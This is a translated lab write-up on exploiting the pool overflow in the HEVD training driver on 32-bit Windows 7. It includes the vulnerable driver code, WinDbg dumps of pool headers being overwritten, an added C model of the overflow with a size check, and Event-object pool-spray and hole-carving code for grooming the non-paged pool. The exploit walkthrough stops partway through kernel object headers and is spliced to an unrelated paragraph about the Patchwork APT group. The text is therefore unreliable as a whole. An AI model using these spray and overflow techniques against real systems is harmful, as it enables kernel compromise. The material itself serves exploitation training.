Environment setup
Win 10 64-bit host + Win 7 32-bit virtual machine
WinDbg: the debugger
VirtualKD-3.0: dual-machine (host/guest) kernel debugging tool
InstDrv: tool for installing and starting the driver
HEVD: a Windows kernel vulnerability training project that covers almost every vulnerability class that can occur in the kernel, which makes it well suited for learning how Windows kernel vulnerabilities work and how they are exploited

Introduction to the Windows kernel pool

To study Windows kernel vulnerabilities you need some familiarity with the Windows pool: its management structures, allocation and freeing all need to be understood well. I will not explain the pool in detail here and only recommend a few references:
https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf
https://www.cnblogs.com/flycat-2016/p/5449738.html
Below is a picture of a kernel pool page; knowing this picture is basically enough for analysing this pool vulnerability.
The Windows kernel has many pool pages of 4 KB each. Every pool page is divided into pool chunks of varying sizes for kernel code to use, and every pool chunk starts with a pool header (8 bytes) that describes the chunk's basic information.
The pool header structure is as follows:
kd> dt nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B
When we run:
KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG);
the function returns a pool chunk, and the returned address is KernelBuffer = pool header + 8. In other words, there is an 8-byte header in front of the space we get back; we simply never see it. Our data immediately follows the pool header, so when our data is too long it runs downward into the neighbouring chunks.
Analysis of the HEVD pool vulnerability code
The vulnerable code is as follows:
#define POOL_BUFFER_SIZE 504

__try {
    DbgPrint("[+] Allocating Pool chunk\n");

    // Allocate Pool chunk
    KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG);

    if (!KernelBuffer) {
        // Unable to allocate Pool chunk
        DbgPrint("[-] Unable to allocate Pool chunk\n");
        Status = STATUS_NO_MEMORY;
        return Status;
    }
    else {
        DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
        DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
        DbgPrint("[+] Pool Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE);
        DbgPrint("[+] Pool Chunk: 0x%p\n", KernelBuffer);
    }

    // Verify if the buffer resides in user mode
    ProbeForRead(UserBuffer, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)__alignof(UCHAR));

    DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
    DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
    DbgPrint("[+] KernelBuffer: 0x%p\n", KernelBuffer);
    DbgPrint("[+] KernelBuffer Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE);

#ifdef SECURE
    // Secure Note: This is secure because the developer is passing a size
    // equal to size of the allocated Pool chunk to RtlCopyMemory()/memcpy().
    // Hence, there will be no overflow
    RtlCopyMemory(KernelBuffer, UserBuffer, (SIZE_T)POOL_BUFFER_SIZE);
#else
    DbgPrint("[+] Triggering Pool Overflow\n");

    // Vulnerability Note: This is a vanilla Pool Based Overflow vulnerability
    // because the developer is passing the user supplied value directly to
    // RtlCopyMemory()/memcpy() without validating if the size is greater or
    // equal to the size of the allocated Pool chunk
    RtlCopyMemory(KernelBuffer, UserBuffer, Size);
#endif

    if (KernelBuffer) {
        DbgPrint("[+] Freeing Pool chunk\n");
        DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
        DbgPrint("[+] Pool Chunk: 0x%p\n", KernelBuffer);

        // Free the allocated Pool chunk
        ExFreePoolWithTag(KernelBuffer, (ULONG)POOL_TAG);
        KernelBuffer = NULL;
    }
}
__except (EXCEPTION_EXECUTE_HANDLER) {
    Status = GetExceptionCode();
    DbgPrint("[-] Exception Code: 0x%X\n", Status);
}
UserBuffer and Size are obtained as follows:
UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
Looking at the code above, it first calls
ExAllocatePoolWithTag(NonPagedPool, (SIZE_T) POOL_BUFFER_SIZE, (ULONG)POOL_TAG);
to allocate a fixed-size chunk from the non-paged pool, and then calls the copy function to copy the data passed in from ring 3 into the allocated pool chunk:
RtlCopyMemory(KernelBuffer, UserBuffer, Size);
Here KernelBuffer has a fixed length, while both UserBuffer and Size are under our control from ring 3. When our Size is larger than POOL_BUFFER_SIZE the copy overflows and overwrites the pool chunk below.
Tracing the vulnerability in the debugger
Set a breakpoint in WinDbg with bp HEVD!TriggerPoolOverflow. Because I compiled the driver myself and have the symbol file, I can break directly on the function name; if you downloaded the driver from the web, you will need to find that function's offset yourself.
After the function has executed
KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG);

we get KernelBuffer = 0x8745dd88, so the pool chunk containing KernelBuffer is at 0x8745dd88 - 8 = 0x8745dd80.
kd> !pool 0x8745dd88
Pool page 8745dd88 region is Nonpaged pool
 8745d000 size:  988 previous size:    0  (Allocated)  Devi (Protected)
 8745d988 size:    8 previous size:  988  (Free)       File
 8745d990 size:   c8 previous size:    8  (Allocated)  Ntfx
 8745da58 size:   90 previous size:   c8  (Allocated)  MmCa
 8745dae8 size:  168 previous size:   90  (Allocated)  CcSc
 8745dc50 size:   b8 previous size:  168  (Allocated)  File (Protected)
 8745dd08 size:    8 previous size:   b8  (Free)       usbp
 8745dd10 size:   68 previous size:    8  (Allocated)  EtwR (Protected)
 8745dd78 size:    8 previous size:   68  (Free)       XSav
*8745dd80 size:  200 previous size:    8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 8745df80 size:   80 previous size:  200  (Free )      MmRl
As you can see, pool pages are 1000h (4 KB) units, and everything inside them is a pool chunk.
Now look at a pool chunk marked Free, the one at address 8745d988:
kd> dd 8745d988
8745d988  00010131 e56c6946 04190001 7866744e
8745d998  00bc0743 00000001 00000000 00000000
8745d9a8  00040001 00000000 8745d9b0 8745d9b0
8745d9b8  00000000 8745da1c 87336164 00000000
8745d9c8  00000000 00000000 00000000 00000000
8745d9d8  00000000 00000000 00000000 00000000
8745d9e8  00000000 00000000 00000000 00280707
8745d9f8  00000000 00000000 00000000 00000000
kd> dt nt!_POOL_HEADER 8745d988
   +0x000 PreviousSize     : 0y100110001 (0x131)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000000001 (0x1)
   +0x002 PoolType         : 0y0000000 (0)
   +0x000 Ulong1           : 0x10131
   +0x004 PoolTag          : 0xe56c6946
   +0x004 AllocatorBackTraceIndex : 0x6946
   +0x006 PoolTagHash      : 0xe56c
PreviousSize is the size of the previous chunk; its value here is 0x131. As the ListHeads array indicates (sizes are counted in 8-byte units), 0x131 corresponds to a chunk size of 0x131 * 8 = 0x988.
BlockSize is the size of this chunk; its value here is 0x1, which by the same rule corresponds to a chunk size of 0x1 * 8 = 0x8.
PoolType = 0 means the chunk is free.
It does not matter if you do not follow all of this yet.
Now look at the pool block we allocated. The function returned 0x8745dd88 and the chunk header is at 0x8745dd80, so the address where the data is really stored is PoolHeader + 8,
i.e. 0x8745dd80 + 8 = 0x8745dd88:
kd> dd 8745dd80
8745dd80  04400001 6b636148 00000000 0000001b
8745dd90  083e0003 c3504c41 88129210 00000148
8745dda0  183c0005 6770534e 85aad038 00000000
8745ddb0  8745dde4 0000000a 00000001 00000001
8745ddc0  8745ddfc 00000018 8745deec 00000018
8745ddd0  8745de8c 00000008 8745debc 00000008
8745dde0  00000004 00000018 00000001 eb004a01
8745ddf0  11d49b1a 50002391 bc597704 00000000
kd> dt nt!_POOL_HEADER 8745dd80
   +0x000 PreviousSize     : 0y000000001 (0x1)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400001
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63
PoolType is 0x2, meaning Allocated: the space is in use. From dd 8745dd80 we can also see that
the data starting at 0x8745dd88 is not all zero, which means ExAllocatePoolWithTag does not initialise the memory it allocates.
//memset(UserModeBuffer, 0x41, 504);
RtlCopyMemory(KernelBuffer, UserBuffer, Size);
After RtlCopyMemory has executed, the data starting at 0x8745dd88 is overwritten with 'A's:
kd> dd 8745dd80 L100
8745dd80  04400001 6b636148 41414141 41414141
8745dd90  41414141 41414141 41414141 41414141
8745dda0  41414141 41414141 41414141 41414141
8745ddb0  41414141 41414141 41414141 41414141
8745ddc0  41414141 41414141 41414141 41414141
8745ddd0  41414141 41414141 41414141 41414141
8745dde0  41414141 41414141 41414141 41414141
8745ddf0  41414141 41414141 41414141 41414141
8745de00  41414141 41414141 41414141 41414141
8745de10  41414141 41414141 41414141 41414141
8745de20  41414141 41414141 41414141 41414141
8745de30  41414141 41414141 41414141 41414141
8745de40  41414141 41414141 41414141 41414141
8745de50  41414141 41414141 41414141 41414141
8745de60  41414141 41414141 41414141 41414141
8745de70  41414141 41414141 41414141 41414141
8745de80  41414141 41414141 41414141 41414141
8745de90  41414141 41414141 41414141 41414141
8745dea0  41414141 41414141 41414141 41414141
8745deb0  41414141 41414141 41414141 41414141
8745dec0  41414141 41414141 41414141 41414141
8745ded0  41414141 41414141 41414141 41414141
8745dee0  41414141 41414141 41414141 41414141
8745def0  41414141 41414141 41414141 41414141
8745df00  41414141 41414141 41414141 41414141
8745df10  41414141 41414141 41414141 41414141
8745df20  41414141 41414141 41414141 41414141
8745df30  41414141 41414141 41414141 41414141
8745df40  41414141 41414141 41414141 41414141
8745df50  41414141 41414141 41414141 41414141
8745df60  41414141 41414141 41414141 41414141
8745df70  41414141 41414141 41414141 41414141
8745df80  08100040 6c526d4d 00000000 87487398
8745df90  00000000 8745df94 8745df94 00000004
8745dfa0  00000005 ffffffff 00000000 00000000
8745dfb0  00000000 8745dfb4 8745dfb4 00000000
8745dfc0  00000000 00000000 00000000 8745dfcc
8745dfd0  8745dfcc 00000004 00000465 87ef35e8
8745dfe0  88097ae0 00000000 00000000 00000000
8745dff0  00000000 00000000 00000000 87f32380
8745e000  01010129 00000000 00055400 0003023f
8745e010  00000000 00055420 00030240 00000000
---------------------------------------------------------
char UserModeBuffer[512 + 8] = { 0x41 };
memset(UserModeBuffer, 0x41, 512);
memset(UserModeBuffer + 512, 0x42, 8);
UserModeBufferSize = 512 + 8;
If UserModeBuffer is larger than the space allocated by ExAllocatePoolWithTag, then executing RtlCopyMemory(KernelBuffer, UserBuffer, Size);
overwrites the metadata of the next pool chunk.
The next chunk before and after being overwritten (the program was run again, so all addresses differ from those above):
kd> dd 8818d610
8818d610  085f0040 70627375 88335fb8 00000000
8818d620  00000000 00000000 00000000 00000000
8818d630  43787254 00000000 00000000 000000c8
8818d640  077415ad 00000000 00000000 0000020a
8818d650  0000000f 000002f0 000002cc 00000003
8818d660  00000001 00000000 6f6d7455 86378028
8818d670  00000000 00000000 00000000 00000000
8818d680  00000000 00000000 00000000 00000000
kd> dt nt!_POOL_HEADER 8818d610
   +0x000 PreviousSize     : 0y001000000 (0x40)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001011111 (0x5f)
   +0x002 PoolType         : 0y0000100 (0x4)
   +0x000 Ulong1           : 0x85f0040
   +0x004 PoolTag          : 0x70627375
   +0x004 AllocatorBackTraceIndex : 0x7375
   +0x006 PoolTagHash      : 0x706
After the overwrite:
kd> dt nt!_POOL_HEADER 8818d610
   +0x000 PreviousSize     : 0y101000001 (0x141)
   +0x000 PoolIndex        : 0y0100000 (0x20)
   +0x002 BlockSize        : 0y101000001 (0x141)
   +0x002 PoolType         : 0y0100000 (0x20)
   +0x000 Ulong1           : 0x41414141
   +0x004 PoolTag          : 0x41414141
   +0x004 AllocatorBackTraceIndex : 0x4141
   +0x006 PoolTagHash      : 0x4141
kd> dd 8818d610
8818d610  41414141 41414141 42424242 42424242
8818d620  00000000 00000000 00000000 00000000
8818d630  43787254 00000000 00000000 000000c8
8818d640  077415ad 00000000 00000000 0000020a
8818d650  0000000f 000002f0 000002cc 00000003
8818d660  00000001 00000000 6f6d7455 86378028
8818d670  00000000 00000000 00000000 00000000
8818d680  00000000 00000000 00000000 00000000
If execution is allowed to continue, the system blue-screens.
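The following program is an added example, not code from HEVD or from this article: it models one 32-bit pool page in user mode so the three points above can be checked on a machine without a kernel debugger. It decodes the _POOL_HEADER bit-fields that the dt output shows (PreviousSize and BlockSize in 8-byte units, PoolType, PoolIndex), reproduces what the unchecked RtlCopyMemory(KernelBuffer, UserBuffer, Size) does to the next chunk's header, shows the size check that prevents it, and walks the header chain the way the allocator does to detect the corruption that ends in the blue screen. The page layout, the 'Even' neighbour chunks, the use of PoolType 2 for allocated chunks, and the functions setup_page, trigger_fixed and validate_page are assumptions of this model, not kernel code.

```c
/* Added example (not HEVD's or the article's code): a user-mode model of one
 * 32-bit pool page. The _POOL_HEADER bit layout is the one dt nt!_POOL_HEADER
 * prints above; the page contents below are constructed for the demo. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define POOL_BUFFER_SIZE 504      /* HEVD's fixed allocation size */
#define GRANULARITY      8        /* x86 pool: size fields count 8-byte units */
#define PAGE_SIZE        0x1000   /* one pool page */

typedef struct {
    uint32_t Ulong1;   /* PreviousSize:9 | PoolIndex:7 | BlockSize:9 | PoolType:7 */
    uint32_t PoolTag;
} pool_header_t;

/* Bit-field decoders, same positions as the dt output (Pos 0 / Pos 9 of each WORD) */
static uint32_t prev_size(uint32_t u)  { return u & 0x1ff; }
static uint32_t pool_index(uint32_t u) { return (u >> 9) & 0x7f; }
static uint32_t block_size(uint32_t u) { return (u >> 16) & 0x1ff; }
static uint32_t pool_type(uint32_t u)  { return (u >> 25) & 0x7f; }

/* Size fields are in 8-byte units: 0x131 -> 0x988 bytes, 0x40 -> 0x200 bytes */
static uint32_t units_to_bytes(uint32_t units) { return units * GRANULARITY; }

static uint8_t page[PAGE_SIZE];                       /* the modelled pool page */
static pool_header_t *hdr_at(size_t off) { return (pool_header_t *)(page + off); }

static void make_chunk(size_t off, uint32_t prev_units, uint32_t units,
                       uint32_t type, uint32_t tag) {
    hdr_at(off)->Ulong1 = (prev_units & 0x1ff) | ((units & 0x1ff) << 16)
                        | ((type & 0x7f) << 25);
    hdr_at(off)->PoolTag = tag;
}

/* Constructed layout (assumption): our 0x200 'Hack' chunk followed by two
 * 0x40 'Even' chunks, as in the sprayed pages later in the article.
 * Returns the end offset of the laid-out region. */
static size_t setup_page(void) {
    memset(page, 0, sizeof page);
    make_chunk(0x000, 0x00, 0x40, 2, 0x6b636148);   /* 'Hack': 0x40 units = 0x200 bytes */
    make_chunk(0x200, 0x40, 0x08, 2, 0x6e657645);   /* 'Even': 8 units = 0x40 bytes */
    make_chunk(0x240, 0x08, 0x08, 2, 0x6e657645);
    return 0x280;
}

/* KernelBuffer as HEVD returns it: 8 bytes past the chunk's header */
static uint8_t *kernel_buffer(void) { return page + sizeof(pool_header_t); }

/* The unchecked copy: Size comes straight from InputBufferLength */
static int trigger_vulnerable(const uint8_t *user, size_t size) {
    memcpy(kernel_buffer(), user, size);
    return 0;
}

/* Hardened variant (my check, not HEVD's SECURE build, which instead copies
 * exactly POOL_BUFFER_SIZE bytes): refuse anything larger than the chunk. */
static int trigger_fixed(const uint8_t *user, size_t size) {
    if (size > POOL_BUFFER_SIZE) return -1;   /* rejected, nothing copied */
    memcpy(kernel_buffer(), user, size);
    return 0;
}

/* Walk the header chain the way the allocator checks it: every header's
 * PreviousSize must equal the BlockSize of the chunk before it. Returns the
 * offset of the first inconsistent header, or -1 if the chain is intact
 * (in the real kernel such a mismatch is the bugcheck seen above). */
static long validate_page(size_t end) {
    size_t off = 0;
    uint32_t expect_prev = 0;
    while (off < end) {
        uint32_t u = hdr_at(off)->Ulong1;
        if (prev_size(u) != expect_prev || block_size(u) == 0) return (long)off;
        expect_prev = block_size(u);
        off += units_to_bytes(block_size(u));
    }
    return -1;
}

int main(void) {
    uint32_t u = 0x10131;   /* Ulong1 of the free 'File' chunk at 8745d988 above */
    printf("Ulong1 %#x: PreviousSize %#x (%#x bytes) PoolIndex %u BlockSize %#x (%#x bytes) PoolType %u\n",
           u, prev_size(u), units_to_bytes(prev_size(u)), pool_index(u),
           block_size(u), units_to_bytes(block_size(u)), pool_type(u));

    uint8_t user[512 + 8];   /* same shape as the article's UserModeBuffer */
    memset(user, 0x41, 512);
    memset(user + 512, 0x42, 8);

    size_t end = setup_page();
    printf("hardened copy of %zu bytes returned %d, chain check %ld\n",
           sizeof user, trigger_fixed(user, sizeof user), validate_page(end));
    trigger_vulnerable(user, sizeof user);
    printf("after overflow: header at 0x200 = %08x %08x, first bad header at 0x%lx\n",
           hdr_at(0x200)->Ulong1, hdr_at(0x200)->PoolTag, validate_page(end));
    return 0;
}
```

Build with any C99 compiler. The decoder reproduces the dt values from the dumps (0x10131 decodes to PreviousSize 0x131 = 0x988 bytes, BlockSize 1 = 8 bytes, PoolType 0; 0x4400001 to BlockSize 0x40 = 0x200 bytes, PoolType 2), and after the 520-byte copy the header at offset 0x200 reads 41414141 41414141 followed by 42424242, exactly the pattern the dd 8818d610 dump shows; validate_page then reports that header because its PreviousSize (0x141) no longer matches the 0x40-unit chunk before it.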
Exploitation
The kernel pool is similar to the heap in Windows user mode: it is used to allocate memory dynamically. Because the vulnerable buffer is allocated on the non-paged pool, we need a technique to control and shape the non-paged pool. That technique is heap (pool) spraying; if you have not met kernel pool spraying before, never mind, just read on.
Windows provides an Event object, which is stored in the non-paged pool and can be created with the CreateEvent API:
HANDLE WINAPI CreateEvent(
    _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes,
    _In_     BOOL                  bManualReset,
    _In_     BOOL                  bInitialState,
    _In_opt_ LPCTSTR               lpName
);
Here we use this API to create two sufficiently large arrays of Event objects, and then release some of the Event objects with the CloseHandle API, creating holes among the allocated pool blocks that coalesce into larger free blocks:
BOOL WINAPI CloseHandle(_In_ HANDLE hObject);
Let us trace this concretely below; it becomes clear once observed.
//heap spray
HANDLE spray_event1[10000] = { NULL };
HANDLE spray_event2[5000] = { NULL };
for (int i = 0; i < 10000; i++) {
    spray_event1[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
}
for (int j = 0; j < 5000; j++) {
    spray_event2[j] = CreateEventA(NULL, FALSE, FALSE, NULL);
}
for (int i = 5000 - 1; i >= 4989; i--) {
    printf("%x\n", spray_event2[i]);
}
Build the spray code as above; at the end it prints the last event handles so that we can observe the pool structure.
kd> !handle eafc

PROCESS 85a54030  SessionId: 1  Cid: 0a0c    Peb: 7ffdf000  ParentCid: 05e8
    DirBase: bebcd580  ObjectTable: a6088008  HandleCount: 15010.
    Image: MyExploitForHevd.exe

Handle table at a6088008 with 15010 entries in use

eafc: Object: 85b33930  GrantedAccess: 001f0003 Entry: a5ada5f8
Object: 85b33930  Type: (85763418) Event
    ObjectHeader: 85b33918 (new version)
        HandleCount: 1  PointerCount: 1

kd> !pool 85b33930
Pool page 85b33930 region is Nonpaged pool
 85b33000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 85b33040 size:  290 previous size:   40  (Free)       ...@
 85b332d0 size:   40 previous size:  290  (Allocated)  SeTl
 85b33310 size:  2f8 previous size:   40  (Allocated)  usbp
 85b33608 size:  2f8 previous size:  2f8  (Allocated)  usbp
*85b33900 size:   40 previous size:  2f8  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 85b33940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b339c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33bc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33c00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33c40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33c80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33cc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33d00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33d40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33d80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33dc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b33fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
As observed above, Even chunks occupy a large number of pool pages, each chunk 0x40 bytes in size.
The pool chunk we allocate is 504 bytes plus the 8-byte pool header: 504 + 8 = 512 = 0x200 = 0x40 * 8, exactly the size of 8 event chunks. This is why we chose the Event kernel object.
Now let us see how to create the holes in the sprayed region:
//Carve holes in the sprayed region, so that our data gets allocated into one of the holes
for (int i = 0; i < 5000; i = i + 16) {
    for (int j = 0; j < 8; j++) {
        //one event object is 0x40 bytes, so a 0x200-byte hole needs 8 event objects
        CloseHandle(spray_event2[i + j]);
    }
}
Run the code and look at the pool page structure again:
kd> !pool 85b32d70
Pool page 85b32d70 region is Nonpaged pool
 85b32000 size:  2f8 previous size:    0  (Allocated)  usbp
 85b322f8 size:  510 previous size:  2f8  (Free)       ."..
 85b32808 size:  2f8 previous size:  510  (Allocated)  usbp
 85b32b00 size:   40 previous size:  2f8  (Free )      Even (Protected)
 85b32b40 size:   40 previous size:   40  (Free )      Even (Protected)
 85b32b80 size:   40 previous size:   40  (Free )      Even (Protected)
 85b32bc0 size:   40 previous size:   40  (Free )      Even (Protected)
 85b32c00 size:   40 previous size:   40  (Free )      Even (Protected)
 85b32c40 size:   40 previous size:   40  (Free )      Even (Protected)
 85b32c80 size:   40 previous size:   40  (Free )      Even (Protected)
 85b32cc0 size:   40 previous size:   40  (Free)       Even
 85b32d00 size:   40 previous size:   40  (Allocated)  Even (Protected)
*85b32d40 size:   40 previous size:   40  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 85b32d80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b32dc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b32e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b32e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b32e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b32ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b32f00 size:  100 previous size:   40  (Free)       Even
As shown above, after we call CloseHandle on a large number of event handles, many holes appear in the kernel pool pages, each 0x40 * 8 = 0x200 bytes in size. When we next allocate 0x200 bytes, there is a high probability that the allocation lands in one of these holes.
This time KernelBuffer = 0x85b108c8; let us look at where it lies:
kd> !pool 0x85b108c8
Pool page 85b108c8 region is Nonpaged pool
 85b10000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 85b10040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10080 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b100c0 size:  200 previous size:   40  (Free)       Even   (hole made of 8 chunks)
 85b102c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 85b10300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b103c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b104c0 size:  200 previous size:   40  (Free)       Even   (hole made of 8 chunks)
 85b106c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 85b10700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b107c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10880 size:   40 previous size:   40  (Allocated)  Even (Protected)
*85b108c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85b10ac0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 85b10b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10bc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10c00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10c40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10c80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10cc0 size:   c0 previous size:   40  (Free)       Even
 85b10d80 size:  140 previous size:   c0  (Allocated)  Io   Process: 873d9478
 85b10ec0 size:   40 previous size:  140  (Allocated)  Even (Protected)
 85b10f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85b10fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
It has landed exactly in one of the holes we carved in the spray.
So when we overflow downward we overwrite some of the Event object's structures. Next we look at how the Event object can be used to take control of execution and run our shellcode.
The various resources of a Windows system are organised as objects (Object), for example File Object, Driver Object, Device Object and so on. In reality, however, what the system's Object Manager sees as these so-called "objects" is only one part of the complete object: the object body.
A kernel object consists of three parts.
The first is:
kd> dt nt!_OBJECT_HEADER_QUOTA_INFO
   +0x000 PagedPoolCharge  : Uint4B
   +0x004 NonPagedPoolCharge : Uint4B
   +0x008 SecurityDescriptorCharge : Uint4B
   +0x00c SecurityDescriptorQuotaBlock : Ptr32 Void

Background

摩訶草 (also known as Hangover, Patchwork, 白象 "White Elephant", etc.; QiAnXin's internal tracking number is APT-Q-36) was first disclosed and named Hangover by the foreign security vendor Norman, and in August 2016 other vendors published detailed follow-up reports on the group. Domestic security vendors usually also call it "White Elephant". The APT group is widely believed to originate from a country in South Asia; its earliest attack activity can be traced back to November 2009, and it became more active from 2015 onward. The group mainly targets Windows systems, but also attacks Android and Mac OS. Its campaigns have used a large number of vulnerabilities, including at least one 0-day exploit.
